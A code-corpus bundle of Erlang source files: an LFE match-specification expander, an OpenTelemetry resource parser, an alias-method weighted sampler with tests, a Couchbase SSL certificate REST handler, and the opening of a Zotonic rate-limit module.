%% Expand the match spec body.
expand(Cls) -> expand(table, Cls).
expand(Dialect, Cls) when Dialect =:= table ; Dialect =:= trace ->
case catch clauses(Cls, #ms{dialect=Dialect}) of
{error,E} -> error(E); %Signals errors
{'EXIT',E} -> error(E); %Signals errors
{Exp,_} -> Exp %Hurrah it worked
end.
%% clauses(MSClauses, State) -> {Patterns,State}.
clauses([Cl0|Cls0], St0) ->
{Cl1,St1} = clause(Cl0, St0),
{Cls1,St2} = clauses(Cls0, St1),
{[cons,Cl1,Cls1],St2};
clauses([], St) -> {[],St}.
%% clause(ClauseBody, State) -> {{Head,Guard,Body},State}.
clause([H0,['when'|G0]|B0], St0) ->
St1 = St0#ms{dc=1,where=guard,bs=[]}, %Reset clause local data
{H1,St2} = head(H0, St1),
{G1,St3} = guard(G0, St2),
{B1,St4} = body(B0, St3),
{[tuple,H1,G1,B1],St4};
clause([H0|B0], St0) ->
St1 = St0#ms{dc=1,where=guard,bs=[]}, %Reset clause local data
{H1,St2} = head(H0, St1),
{B1,St3} = body(B0, St2),
{[tuple,H1,[],B1],St3}.
%% head(Patterns, State) -> {Pattern,State}.
%% Expand a head which can only consist of one argument. Only allow
%% aliasing at the top-level and only to a variable.
head(Pats, St0) ->
St1 = St0#ms{where=head}, %We are now in the head
case Pats of %Test for top-level aliasing
[['=',S,Pat]] when is_atom(S) ->
St2 = new_binding(S, '$_', St1),
head_pattern(Pat, St2);
[['=',Pat,S]] when is_atom(S) ->
St2 = new_binding(S, '$_', St1),
head_pattern(Pat, St2);
[Pat] -> head_pattern(Pat, St1);
_ -> throw({error,{match_spec_head,Pats}}) %Wrong size
end.
%% head_pattern(Pattern, State) -> {Pattern,State}.
%% Check the head pattern has the right format for the dialect.
head_pattern(Pat, St) -> %Just a variable
check_head(Pat, St#ms.dialect), %Correct format
pattern(Pat, St).
check_head(Pat, _) when is_atom(Pat) -> ok; %Variable
check_head(Pat, table) when is_tuple(Pat) -> ok;
check_head(?Q(Pat), table) when is_tuple(Pat) -> ok;
check_head([tuple|_], table) -> ok;
check_head(['record'|_], table) -> ok;
%% make-record has been deprecated but we sill accept it for now.
check_head(['make-record'|_], table) -> ok;
check_head(?Q(Pat), trace) when is_list(Pat) -> ok;
check_head([list|_], trace) -> ok;
check_head([cons|_], trace) -> ok;
check_head([], trace) -> ok;
check_head(Pat, _Type) ->
throw({error,{match_spec_head,Pat}}).
%% pattern(Pattern, State) -> {Pattern,State}.
pattern('_', St) -> {?Q('_'),St};
pattern(Symb, St0) when is_atom(Symb) -> %Variable
{Dv,St1} = pat_binding(Symb, St0),
{?Q(Dv),St1};
pattern(?Q(_)=E, St) -> {E,St};
pattern([cons,H0,T0], St0) ->
{H1,St1} = pattern(H0, St0),
{T1,St2} = pattern(T0, St1),
{[cons,H1,T1],St2};
pattern([list|Ps0], St0) ->
{Ps1,St1} = pat_list(Ps0, St0),
{[list|Ps1],St1};
pattern([tuple|Ps0], St0) ->
{Ps1,St1} = pat_list(Ps0, St0),
{[tuple|Ps1],St1};
pattern(['=',L0,R0], St0) -> %General aliasing
{L1,St1} = pattern(L0, St0),
{R1,St2} = pattern(R0, St1),
{['=',L1,R1],St2};
pattern(['record',R|Fs0], St0) ->
%% This is in a term but is going to be used as a pattern!
{Fs1,St1} = pat_rec_fields(Fs0, St0),
{['record',R|Fs1],St1};
%% make-record has been deprecated but we sill accept it for now.
pattern(['make-record',R|Fs0], St0) ->
%% This is in a term but is going to be used as a pattern!
{Fs1,St1} = pat_rec_fields(Fs0, St0),
{['make-record',R|Fs1],St1};
pattern(['record-index',R,F], St) ->
{['record-index',R,F],St};
%% Support old no constructor style list forms.
pattern([H0|T0], St0) ->
{H1,St1} = pattern(H0, St0),
{T1,St2} = pattern(T0, St1),
{[H1,T1],St2};
pattern(E, St) -> {E,St}. %Atomic
pat_list(Ps, St) -> mapfoldl(fun pattern/2, St, Ps).
%% pat_rec_fields(Fields, State) -> {Patterns,State}.
pat_rec_fields([F,P0|Fs0], St0) when is_atom(F) ->
%% Field names go straight through untouched.
{P1,St1} = pattern(P0, St0),
{Fs1,St2} = pat_rec_fields(Fs0, St1),
{[F,P1|Fs1],St2};
pat_rec_fields([F0,P0|Fs0], St0) ->
{F1,St1} = pattern(F0, St0),
{P1,St2} = pattern(P0, St1),
{Fs1,St3} = pat_rec_fields(Fs0, St2),
{[F1,P1|Fs1],St3};
pat_rec_fields([], St) -> {[],St}.
%% pat_binding(Var, Status) -> {DVar,Status}.
%% Get dollar var for variable, creating a new one if neccessary.
pat_binding(Var, St0) ->
case find_binding(Var, St0) of
{ok,Dv} -> {Dv,St0};
error ->
{Dv,St1} = new_dollar(St0),
{Dv,new_binding(Var, Dv, St1)}
end.
%% guard(Tests, State) -> {Tests,State}.
%% body(Tests, State) -> {Tests,State}.
%% The expression translation in the same except for which
%% expressions/tests are allowed. We use the same functions but carry
%% a 'where' field in the State to separate them.
guard(Ts, St0) ->
St1 = St0#ms{where=guard},
exprs(Ts, St1).
body(Es, St0) ->
St1 = St0#ms{where=body},
exprs(Es, St1).
%% exprs(Es, State) -> {Conses,State}.
%% expr(E, State) -> {E,State}.
exprs([E0|Es0], St0) ->
{E1,St1} = expr(E0, St0),
{Es1,St2} = exprs(Es0, St1),
{[cons,E1,Es1],St2};
exprs([], St) -> {[],St}.
expr(S, St) when is_atom(S) -> %Variable
case find_binding(S, St) of
{ok,Dv} -> {?Q(Dv),St}; %Head variable
error -> {S,St} %Free variable, need binding
end;
expr(?Q(A)=E, St) when is_atom(A) -> %Atom
case atom_to_list(A) of
[$$|_] -> {[tuple,?Q(const),E],St}; %Catch dollar variables
_ -> {E,St}
end;
expr(?Q(T), St) when is_tuple(T) -> %Must tuple tuples
{[tuple,T],St};
expr(?Q(_)=E, St) -> {E,St}; %No need for {const,E}?
expr([cons,H0,T0], St0) ->
{H1,St1} = expr(H0, St0),
{T1,St2} = expr(T0, St1),
{[cons,H1,T1],St2};
expr([list|Es0], St0) ->
{Es1,St1} = expr_list(Es0, St0),
{[list|Es1],St1};
expr([tuple|Es0], St0) -> %Must tuple tuples
{Es1,St1} = expr_list(Es0, St0),
{[tuple,[tuple|Es1]],St1}; %Yes this is what it is
expr([binary|Segs0], St0) ->
{Segs1,St1} = expr_bitsegs(Segs0, St0),
{[binary|Segs1],St1};
%% Record special forms.
expr(['record',Name|Fs], St0) ->
%% This is in a term and is going to be used as an expression!
{Efs,St1} = expr_rec_fields(Fs, St0),
{[tuple,['record',Name|Efs]],St1}; %Must tuple tuples
%% make-record has been deprecated but we sill accept it for now.
expr(['make-record',Name|Fs], St0) ->
%% This is in a term and is going to be used as an expression!
{Efs,St1} = expr_rec_fields(Fs, St0),
{[tuple,['make-record',Name|Efs]],St1}; %Must tuple tuples
expr(['is-record',E,Name], St0) ->
{Ee,St1} = expr(E, St0),
{[tuple,['is-record',Ee,Name]],St1};
expr(['record-index',Name,F], St) ->
{['record-index',Name,F],St};
expr(['record-field',E,Name,F], St0) ->
%% We must remove all checks and return simple call to element/2.
{Ee,St1} = expr(E, St0),
{[tuple,?Q(element),['record-index',Name,F],Ee],St1};
%% {[tuple,['record-field',Ee,Name,F]],St1};
expr(['record-update',E,Name|Fs], St0) ->
%% We must remove all checks and return simple nested setelement/3 calls.
{Ee,St1} = expr(E, St0),
{Efs,St2} = expr_rec_fields(Fs, St1),
Set = expr_set_record(Efs, Ee, Name),
{Set,St2};
%% {[tuple,['record-update',Ee,Name|Efs]],St2};
%% Special match spec calls.
expr([bindings], St) -> {?Q('$*'),St}; %Special calls
expr([object], St) -> {?Q('$_'),St};
%% General function calls.
expr([call,?Q(erlang),?Q(Op)|Es0], St0) when is_atom(Op) ->
Ar = length(Es0),
case is_ms_erlang_func(Op, Ar, St0#ms.where) of
true ->
{Es1,St1} = expr_list(Es0, St0),
{[tuple,?Q(Op)|Es1],St1};
false -> illegal_func_error({erlang,Op,Ar})
end;
expr([call,M,F|As], _St) ->
illegal_func_error({M,F,length(As)});
expr([Op|Es0], St0) when is_atom(Op) ->
Ar = length(Es0),
case is_ms_func(Op, Ar, St0#ms.where) of %Need to know where we are!
true ->
{Es1,St1} = expr_list(Es0, St0),
{[tuple,?Q(Op)|Es1],St1};
false -> illegal_func_error({Op,Ar})
end;
expr([_|_], _) -> throw({error,illegal_ms_call});
expr([], St) -> {[],St};
expr(T, St) when is_tuple(T) -> %Must tuple tuples
{[tuple,T],St};
expr(E, St) -> {E,St}. %Atomic
expr_list(Es, St) -> mapfoldl(fun expr/2, St, Es).
expr_bitsegs(Ss, St) -> mapfoldl(fun expr_bitseg/2, St, Ss).
expr_bitseg([Val0|Specs0]=F, St0) ->
case is_integer_list(F) of
true -> {F,St0};
false ->
{Specs1,St1} = expr_bitspecs(Specs0, St0),
case is_integer_list(Val0) of
true -> {[Val0|Specs1],St1};
false ->
{Val1,St2} = expr(Val0, St1),
{[Val1|Specs1],St2}
end
end;
expr_bitseg(Val, St) ->
expr(Val, St).
expr_bitspecs(Specs, St) ->
mapfoldl(fun ([size,Sz0], S0) ->
{Sz1,S1} = expr(Sz0, S0),
{[size,Sz1],S1};
(Sp, S) -> {Sp,S}
end, St, Specs).
%% expr_rec_fields(Fields, State) -> {Patterns,State}.
expr_rec_fields([F,V0|Fs0], St0) when is_atom(F) ->
%% Field names go straight through untouched.
{V1,St1} = expr(V0, St0),
{Fs1,St2} = expr_rec_fields(Fs0, St1),
{[F,V1|Fs1],St2};
expr_rec_fields([F0,V0|Fs0], St0) ->
{F1,St1} = expr(F0, St0),
{V1,St2} = expr(V0, St1),
{Fs1,St3} = expr_rec_fields(Fs0, St2),
{[F1,V1|Fs1],St3};
expr_rec_fields([], St) -> {[],St}.
%% expr_set_record(Fields, Expr, Record) -> SetRec.
expr_set_record([F,V|Fs], E0, R) ->
E1= [tuple,?Q(setelement),['record-index',R,F],E0,V],
expr_set_record(Fs, E1, R);
expr_set_record([], E, _) -> E.
is_integer_list([I|Is]) when is_integer(I) ->
is_integer_list(Is);
is_integer_list([]) -> true;
is_integer_list(_) -> false.
illegal_func_error(Func) ->
throw({error,{illegal_ms_func,Func}}).
%% We are very explicit in what operators and functions are allowed.
is_ms_test(is_atom,1) -> true;
is_ms_test(is_float,1) -> true;
is_ms_test(is_integer,1) -> true;
is_ms_test(is_list,1) -> true;
is_ms_test(is_number,1) -> true;
is_ms_test(is_pid,1) -> true;
is_ms_test(is_port,1) -> true;
is_ms_test(is_reference,1) -> true;
is_ms_test(is_tuple,1) -> true;
is_ms_test(is_map,1) -> true;
is_ms_test(is_binary,1) -> true;
is_ms_test(is_function,1) -> true;
is_ms_test(is_record,2) -> true;
is_ms_test(is_record,3) -> true; %We get this one directly
is_ms_test(is_seq_trace,0) -> true;
is_ms_test(_,_) -> false.
is_erl_guard(abs,1) -> true;
is_erl_guard(element,2) -> true;
is_erl_guard(hd,1) -> true;
is_erl_guard(length,1) -> true;
is_erl_guard(node,0) -> true;
is_erl_guard(node,1) -> true;
is_erl_guard(round,1) -> true;
is_erl_guard(size,1) -> true;
is_erl_guard(map_size,1) -> true;
is_erl_guard(tl,1) -> true;
is_erl_guard(trunc,1) -> true;
is_erl_guard(self,0) -> true;
is_erl_guard(float,1) -> true;
is_erl_guard(_,_) -> false.
is_ms_guard(get_tcw, 0) -> true; %MS pseudo guard function
is_ms_guard(N, A) -> is_erl_guard(N, A).
is_ms_action(caller, 0) -> true;
is_ms_action(disable_trace, 1) -> true;
is_ms_action(disable_trace, 2) -> true;
is_ms_action(display, 1) -> true;
is_ms_action(enable_trace, 1) -> true;
is_ms_action(enable_trace, 2) -> true;
is_ms_action(exception_trace, 0) -> true;
is_ms_action(get_seq_token, 0) -> true;
is_ms_action(process_dump,0) -> true;
is_ms_action(message, 1) -> true;
is_ms_action(return_trace, 0) -> true;
is_ms_action(set_seq_token, 2) -> true;
is_ms_action(set_tcw, 1) -> true;
is_ms_action(silent, 1) -> true;
is_ms_action(trace, 2) -> true;
is_ms_action(trace, 3) -> true;
is_ms_action(_, _) -> false.
is_ms_bool('and',2) -> true;
is_ms_bool('or',2) -> true;
is_ms_bool('xor',2) -> true;
is_ms_bool('not',1) -> true;
is_ms_bool('andalso',2) -> true;
is_ms_bool('orelse',2) -> true;
is_ms_bool(_,_) -> false.
is_ms_arith('+',1) -> true;
is_ms_arith('+',2) -> true;
is_ms_arith('-',1) -> true;
is_ms_arith('-',2) -> true;
is_ms_arith('*',2) -> true;
is_ms_arith('/',2) -> true;
is_ms_arith('div',2) -> true;
is_ms_arith('rem',2) -> true;
is_ms_arith('band',2) -> true;
is_ms_arith('bor',2) -> true;
is_ms_arith('bxor',2) -> true;
is_ms_arith('bnot',1) -> true;
is_ms_arith('bsl',2) -> true;
is_ms_arith('bsr',2) -> true;
is_ms_arith(_,_) -> false.
is_ms_comp('>',2) -> true;
is_ms_comp('>=',2) -> true;
is_ms_comp('<',2) -> true;
is_ms_comp('=<',2) -> true;
is_ms_comp('==',2) -> true;
is_ms_comp('=:=',2) -> true;
is_ms_comp('/=',2) -> true;
is_ms_comp('=/=',2) -> true;
is_ms_comp(_,_) -> false.
is_ms_op(Op, Ar) ->
is_ms_bool(Op, Ar) orelse is_ms_arith(Op, Ar) orelse is_ms_comp(Op, Ar).
is_ms_erlang_func(N, A, _) ->
is_erl_guard(N, A) orelse is_ms_test(N, A) orelse is_ms_bool(N, A) orelse
is_ms_arith(N, A) orelse is_ms_comp(N, A).
%% is_ms_func(Name, Arity, Where) -> bool().
%% Test if Name/Arity is legal function in Where (guard/body).
is_ms_func(N, A, body) ->
is_ms_action(N, A) orelse is_ms_guard(N, A) orelse is_ms_test(N, A) orelse
is_ms_op(N, A);
is_ms_func(N, A, guard) ->
is_ms_guard(N, A) orelse is_ms_test(N, A) orelse is_ms_op(N, A).
%% new_binding(Name, Value, State) -> State.
%% find_binding(Name, State) -> {ok,Value} | error.
%% fetch_binding(Name, State) -> Value.
new_binding(Var, Val, #ms{bs=Bs}=St) ->
St#ms{bs=orddict:store(Var, Val, Bs)}.
find_binding(Var, #ms{bs=Bs}) ->
orddict:find(Var, Bs).
%% fetch_binding(Var, #ms{bs=Bs}) ->
%% orddict:fetch(Var, Bs).
new_dollar(St) ->
C = St#ms.dc,
{list_to_atom("$" ++ integer_to_list(C)),St#ms{dc=C+1}}. | src/lfe_ms.erl | 0.562056 | 0.414069 | lfe_ms.erl | starcoder |
%%%------------------------------------------------------------------------
%% Copyright 2020, OpenTelemetry Authors
%% Licensed under the Apache License, Version 2.0 (the "License");
%% you may not use this file except in compliance with the License.
%% You may obtain a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing, software
%% distributed under the License is distributed on an "AS IS" BASIS,
%% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
%% See the License for the specific language governing permissions and
%% limitations under the License.
%%
%% @doc Adds attributes to the `Resource' based on the value of `resource'
%% in the `opentelemetry' application's environment.
%%
%% [{service, #{name => "service-name",
%% namespace => "service-namespace"}]
%%
%% Results in the `Resource' attributes `service.name' and `service.namespace'.
%% @end
%%%-----------------------------------------------------------------------
-module(ot_resource_app_env).
-export([get_resource/0,
parse/1]).
get_resource() ->
Attributes = parse(application:get_env(opentelemetry, resource, #{})),
ot_resource:create(Attributes).
%%
parse(Attributes) when is_map(Attributes) ->
parse(maps:to_list(Attributes));
parse(Attributes) when is_list(Attributes) ->
lists:flatmap(fun({Key, Values}) when is_list(Key) ; is_binary(Key) ; is_atom(Key) ->
parse_values(to_string(Key), Values);
(_) ->
%% ignore anything else
[]
end, Attributes);
parse(_) ->
%% must be a map or list. ignore and return empty if it isn't
[].
parse_values(Key, Values) when is_map(Values) ->
parse_values(Key, maps:to_list(Values));
parse_values(Key, Values) when is_list(Values) ->
lists:flatmap(fun({SubKey, Value=[{_,_}|_]}) ->
%% list of tuples means we have more subkeys
parse_values([Key, ".", to_string(SubKey)], Value);
({SubKey, Value}) when is_map(Value) ->
%% map value means we have more subkeys
parse_values([Key, ".", to_string(SubKey)], Value);
({SubKey, Value})->
[{unicode:characters_to_list([Key, ".", to_string(SubKey)]), Value}]
end, Values);
parse_values(Key, Value) ->
[{unicode:characters_to_list(Key), Value}].
-spec to_string(atom() | binary() | list()) -> list().
to_string(K) when is_atom(K) ->
atom_to_list(K);
to_string(K) when is_binary(K) ->
binary_to_list(K);
to_string(K) ->
K. | src/ot_resource_app_env.erl | 0.651798 | 0.449936 | ot_resource_app_env.erl | starcoder |
%% Implement weighted sampling with replacement using the alias method.
%%
%% Sources:
%% 1) http://en.wikipedia.org/wiki/Alias_method
%% 2) http://www.keithschwarz.com/darts-dice-coins/
%% 3) https://hips.seas.harvard.edu/blog/2013/03/03/the-alias-method-efficient-sampling-with-many-discrete-outcomes/
%%
-module(sampler_alias).
-behaviour(gen_server).
%% gen_server callbacks
-export([init/1, handle_call/3, handle_cast/2, handle_info/2,
terminate/2, code_change/3]).
%% API
-export([start_link/1, stop/1]).
-export([get_weight/2, set_weight/3]).
-export([to_proplist/1]).
-export([draw/1]).
-ifdef(TEST).
-include_lib("proper/include/proper.hrl").
-include_lib("eunit/include/eunit.hrl").
-endif.
-record(alias, {
len :: non_neg_integer(),
keys :: array:array(),
weights :: orddict:orddict(),
alias :: array:array(),
probs :: array:array()
}).
-type alias_vectors() :: #alias{}.
-type weight() :: {atom() , non_neg_integer()}.
%% API
-spec start_link([weight()]) -> {ok, pid()}.
start_link(WeightedList) ->
start_link(WeightedList, os:timestamp()).
%% @private
%% Internal utility to explicitly seed the random number generator.
-spec start_link([weight()], erlang:timestamp()) -> {ok, pid()}.
start_link(WeightedList, Seed) ->
gen_server:start_link(?MODULE, [WeightedList, Seed], []).
-spec stop(pid()) -> ok.
stop(Pid) when is_pid(Pid) ->
gen_server:call(Pid, stop).
-spec get_weight(any(), pid()) -> non_neg_integer() | {error, term()}.
get_weight(Key, Pid) ->
gen_server:call(Pid, {get_weight, Key}).
-spec set_weight(any(), non_neg_integer(), pid()) -> ok | {error, term()}.
set_weight(Key, Weight, Pid) when Weight >= 0 ->
gen_server:call(Pid, {set_weight, Key, Weight}).
-spec to_proplist(pid()) -> [weight()] | {error, term()}.
to_proplist(Pid) ->
gen_server:call(Pid, to_proplist).
-spec draw(pid()) -> atom() | {error, term()}.
draw(Pid) ->
gen_server:call(Pid, draw).
%% gen_server callbacks
init([WeightedList, Seed]) ->
_ = random:seed(Seed),
{ok, make_alias(WeightedList)}.
handle_call({get_weight, Weight}, _From, Alias) ->
{reply, get(weight, Weight, Alias), Alias};
handle_call({set_weight, Key, Weight}, _From, Alias) ->
UpdatedAlias = set(weight, Key, Weight, Alias),
{reply, ok, UpdatedAlias};
handle_call(draw, _From, Alias) ->
{reply, select(Alias), Alias};
handle_call(to_proplist, _From, Alias = #alias{weights = Weights}) ->
{reply, orddict:to_list(Weights), Alias};
handle_call(stop, _From, Alias) ->
{stop, normal, Alias};
handle_call(_Other, _Form, Alias) ->
error_logger:warning_msg("received unknown request: ~p", [_Other]),
{noreply, Alias}.
handle_cast(_Unknown, Alias) ->
error_logger:warning_msg("received unknown request: ~p", [_Unknown]),
{noreply, Alias}.
handle_info(_Unknown, Alias) ->
error_logger:warning_msg("received unknown message: ~p", [_Unknown]),
{noreply, Alias}.
terminate(_Reason, _Alias) ->
ok.
code_change(_OldVsn, Alias, _Extra) ->
{ok, Alias}.
%% Internal
-spec make_alias([weight()]) -> alias_vectors().
make_alias(WeightedList) ->
WeightDict = orddict:from_list(WeightedList),
N = orddict:size(WeightDict),
SumWeights = orddict:fold(fun (_, V, Acc) -> Acc + V end, 0, WeightDict),
%% Calculate Probabilites & Normalise by the average (multiply by N).
ScaledProbabilties = if SumWeights > 0 ->
orddict:fold(fun (_, V, Acc) ->
Acc ++ [(V/SumWeights) * N]
end, [], WeightDict);
true ->
%% Prevent non positive sums to proceed.
error(badarg)
end,
%% Sort probabilities into larger & smaller than 1/N.
%% Note we already multipilied by N, therfore compare to > or < 1.
Sort = fun (P, {Small, Large, Index}) when P < 1 ->
{[Index | Small], Large, Index + 1};
(_P, {Small, Large, Index}) ->
{Small, [Index | Large], Index + 1}
end,
{Small, Large, _} = lists:foldl(Sort, {[],[],0}, ScaledProbabilties),
%% Itirate and allocate the large probabilites to the low.
{Alias, Probabilities} = update_probabilities(Small, Large, array:new(N),
array:from_list(ScaledProbabilties)),
#alias{len = N,
keys = array:from_list(orddict:fetch_keys(WeightDict)),
weights = WeightDict,
alias = Alias,
probs = Probabilities}.
get(weight, Key, #alias{weights = Weights}) ->
orddict:fetch(Key, Weights).
set(weight, Key, Weight, #alias{weights = Weights}) ->
make_alias(orddict:store(Key, Weight, Weights)).
update_probabilities([], _Large, A, Pr) ->
{A, Pr};
update_probabilities(_Small, [], A, Pr) ->
{A, Pr};
update_probabilities([S | Small], [L | Large], A, Pr) ->
%% Fill the small
A1 = array:set(S, L, A),
%% Calculate replacement probability.
P = array:get(L, Pr) - (1 - array:get(S, Pr)),
Pr1 = array:set(L, P, Pr),
{Small1, Large1} = case P < 1 of
true -> {[L | Small], Large};
false -> {Small, [L | Large]}
end,
update_probabilities(Small1, Large1, A1, Pr1).
-spec select(alias_vectors()) -> any().
select(#alias{len = N, keys = K, alias = A, probs = Pr}) ->
%% Role the die
DieRoll = random:uniform(N) - 1,
%% Now toss the coin
Random = random:uniform(),
Index = case Random =< array:get(DieRoll, Pr) of
true ->
DieRoll;
false ->
array:get(DieRoll, A)
end,
array:get(Index, K).
-ifdef(TEST).
-define(SAMPLE, 10000).
create_and_sample_results(WeightedList) ->
{ok, Sampler} = sampler_alias:start_link(WeightedList),
draw_n_samples(Sampler, ?SAMPLE).
never_never_occurs_test() ->
Probabilities = create_and_sample_results([{always, 1}, {never, 0}]),
%% Ensure never is not set.
?assertEqual(false, proplists:is_defined(never, Probabilities)),
?assertEqual(1.0, proplists:get_value(always, Probabilities)).
simple_weighted_test() ->
Probabilities = create_and_sample_results([{twice, 2}, {once, 1}, {never, 0}]),
%% Ensure never is not set.
?assertEqual(false, proplists:is_defined(never, Probabilities)),
%% Check Twice to be about 66% multiplying 10 & trunc reduces
%% floating point precision.
Twice = proplists:get_value(twice, Probabilities, 0),
?assertEqual(6, trunc(Twice *10)),
%% Check once
Once = proplists:get_value(once, Probabilities, 0),
?assertEqual(3, trunc(Once * 10)).
equal_distribution_test() ->
Probabilities = create_and_sample_results([{beer, 1},
{code, 1},
{food, 1},
{sleep, 1}]),
[?_assertEqual(0.25, P) || {_, P} <- Probabilities].
update_and_find_weight_test() ->
%% Simple Validation Tests
Alias = make_alias([{one, 10}, {two, 20}, {three, 30}]),
?assertEqual(10, get(weight, one, Alias)),
?assertEqual(20, get(weight, two, Alias)),
?assertEqual(30, get(weight, three, Alias)),
Alias1 = set(weight, two, 200, Alias),
?assertEqual(10, get(weight, one, Alias1)),
?assertEqual(200, get(weight, two, Alias1)),
?assertEqual(30, get(weight, three, Alias1)).
run_proper_test_() ->
{ %% Timeout proper after 5 min
timeout, 360,
?_assertEqual([], proper:module(sampler_alias, [{to_file, user}]))
}.
%% draw n times
draw_n_samples(Pid, N) ->
Samples = [draw(Pid) || _ <- lists:seq(1, N)],
Aggregate = lists:foldl(
fun(V, D) -> dict:update_counter(V, 1, D) end,
dict:new(),
Samples),
%% Calculate Probabilities
[{K, V / N} || {K, V} <- dict:to_list(Aggregate)].
draw_and_check(Weights, Seed) ->
{ok, Sampler} = start_link(Weights, Seed),
NoDuplicateWeights = orddict:from_list(Weights),
Probabilities = draw_n_samples(Sampler, ?SAMPLE),
SumWeights = lists:foldl(fun ({_, W}, Acc) -> W + Acc end,
0, NoDuplicateWeights),
Test = fun (Key, Probability) ->
Pr = proplists:get_value(Key, NoDuplicateWeights) / SumWeights,
%% Check accuracy to 0.02
abs(Pr - Probability) < 0.02
end,
[{K, P, Test(K, P)} || {K, P} <- Probabilities].
%% KLUDGE: Not sure why, by the native timestamp doesn't work in 17.0+.
%% See issue raised at https://github.com/manopapad/proper/issues/94.
-type timestamp() :: {MegaSecs :: non_neg_integer(),
Secs :: non_neg_integer(),
MicroSecs :: non_neg_integer()}.
prop_sample() ->
%% Ensure we always have a positive sum of weights.
?FORALL({Weights, Seed}, {non_empty(list({atom(), pos_integer()})), timestamp()},
begin
Probs = draw_and_check(Weights, Seed),
Check = fun ({_, _, Test}, Acc) -> Test and Acc end,
?WHENFAIL(erlang:display({"Error Probabilities", Probs}),
lists:foldl(Check, true, Probs))
end).
prop_set_weight() ->
{ok, Pid} = sampler_alias:start_link([{foo, 1}]),
?FORALL(Weight, weight(),
begin
{Key, Value} = Weight,
ok = sampler_alias:set_weight(Key, Value, Pid),
Value =:= sampler_alias:get_weight(Key, Pid)
end).
-endif. | src/sampler_alias.erl | 0.746786 | 0.533944 | sampler_alias.erl | starcoder |
%% @author Couchbase <<EMAIL>>
%% @copyright 2015 Couchbase, Inc.
%%
%% Licensed under the Apache License, Version 2.0 (the "License");
%% you may not use this file except in compliance with the License.
%% You may obtain a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing, software
%% distributed under the License is distributed on an "AS IS" BASIS,
%% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
%% See the License for the specific language governing permissions and
%% limitations under the License.
%%
%% @doc REST api's for handling ssl certificates
-module(menelaus_web_cert).
-include("ns_common.hrl").
-export([handle_cluster_certificate/1,
handle_regenerate_certificate/1,
handle_upload_cluster_ca/1,
handle_reload_node_certificate/1,
handle_get_node_certificate/2]).
handle_cluster_certificate(Req) ->
menelaus_web:assert_is_enterprise(),
case proplists:get_value("extended", Req:parse_qs()) of
"true" ->
handle_cluster_certificate_extended(Req);
_ ->
handle_cluster_certificate_simple(Req)
end.
handle_cluster_certificate_simple(Req) ->
Cert = case ns_server_cert:cluster_ca() of
{GeneratedCert, _} ->
GeneratedCert;
{UploadedCAProps, _, _} ->
proplists:get_value(pem, UploadedCAProps)
end,
menelaus_util:reply_ok(Req, "text/plain", Cert).
format_time(UTCSeconds) ->
LocalTime = calendar:universal_time_to_local_time(
calendar:gregorian_seconds_to_datetime(UTCSeconds)),
menelaus_util:format_server_time(LocalTime, 0).
warning_props({expires_soon, UTCSeconds}) ->
[{message, ns_error_messages:node_certificate_warning(expires_soon)},
{expires, format_time(UTCSeconds)}];
warning_props(Warning) ->
[{message, ns_error_messages:node_certificate_warning(Warning)}].
translate_warning({Node, Warning}) ->
[{node, Node} | warning_props(Warning)].
jsonify_cert_props(Props) ->
lists:map(fun ({expires, UTCSeconds}) ->
{expires, format_time(UTCSeconds)};
({K, V}) when is_list(V) ->
{K, list_to_binary(V)};
(Pair) ->
Pair
end, Props).
handle_cluster_certificate_extended(Req) ->
{Cert, WarningsJson} =
case ns_server_cert:cluster_ca() of
{GeneratedCert, _} ->
{[{type, generated},
{pem, GeneratedCert}], []};
{UploadedCAProps, _, _} ->
Warnings = ns_server_cert:get_warnings(UploadedCAProps),
{[{type, uploaded} | UploadedCAProps],
[{translate_warning(Pair)} || Pair <- Warnings]}
end,
menelaus_util:reply_json(Req, {[{cert, {jsonify_cert_props(Cert)}},
{warnings, WarningsJson}]}).
handle_regenerate_certificate(Req) ->
menelaus_web:assert_is_enterprise(),
ns_server_cert:generate_and_set_cert_and_pkey(),
ns_ssl_services_setup:sync_local_cert_and_pkey_change(),
?log_info("Completed certificate regeneration"),
ns_audit:regenerate_certificate(Req),
handle_cluster_certificate_simple(Req).
reply_error(Req, Error) ->
menelaus_util:reply_json(
Req, {[{error, ns_error_messages:cert_validation_error_message(Error)}]}, 400).
handle_upload_cluster_ca(Req) ->
menelaus_web:assert_is_enterprise(),
menelaus_web:assert_is_45(),
case Req:recv_body() of
undefined ->
reply_error(Req, empty_cert);
PemEncodedCA ->
case ns_server_cert:set_cluster_ca(PemEncodedCA) of
{ok, Props} ->
ns_audit:upload_cluster_ca(Req,
proplists:get_value(subject, Props),
proplists:get_value(expires, Props)),
handle_cluster_certificate_extended(Req);
{error, Error} ->
reply_error(Req, Error)
end
end.
handle_reload_node_certificate(Req) ->
menelaus_web:assert_is_enterprise(),
menelaus_web:assert_is_45(),
case ns_server_cert:apply_certificate_chain_from_inbox() of
{ok, Props} ->
ns_audit:reload_node_certificate(Req,
proplists:get_value(subject, Props),
proplists:get_value(expires, Props)),
menelaus_util:reply(Req, 200);
{error, Error} ->
?log_error("Error reloading node certificate: ~p", [Error]),
menelaus_util:reply_json(
Req, ns_error_messages:reload_node_certificate_error(Error), 400)
end.
handle_get_node_certificate(NodeId, Req) ->
menelaus_web:assert_is_enterprise(),
case menelaus_web:find_node_hostname(NodeId, Req) of
{ok, Node} ->
case ns_server_cert:get_node_cert_info(Node) of
[] ->
menelaus_util:reply_text(Req, <<"Certificate is not set up on this node">>, 404);
Props ->
menelaus_util:reply_json(Req, {jsonify_cert_props(Props)})
end;
false ->
menelaus_util:reply_text(Req, <<"Node is not found">>, 404)
end. | src/menelaus_web_cert.erl | 0.598899 | 0.412234 | menelaus_web_cert.erl | starcoder |
%% @author <NAME> <<EMAIL>>
%% @copyright 2019 Driebit BV
%% @doc Rate limiting of authentication tries and other types of requests
%% Copyright 2019 Driebit BV
%%
%% Licensed under the Apache License, Version 2.0 (the "License");
%% you may not use this file except in compliance with the License.
%% You may obtain a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing, software
%% distributed under the License is distributed on an "AS IS" BASIS,
%% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
%% See the License for the specific language governing permissions and
%% limitations under the License.
-module(m_ratelimit).
-behaviour(zotonic_model).
